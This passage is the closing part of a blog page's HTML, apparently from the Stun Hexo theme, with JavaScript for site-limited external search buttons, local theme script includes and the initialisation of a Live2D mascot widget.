  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', 'Please enter characters');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.json"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"superSample":2,"width":150,"height":300,"position":"left","hOffset":0,"vOffset":-80},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.8},"log":false});</script></body></html>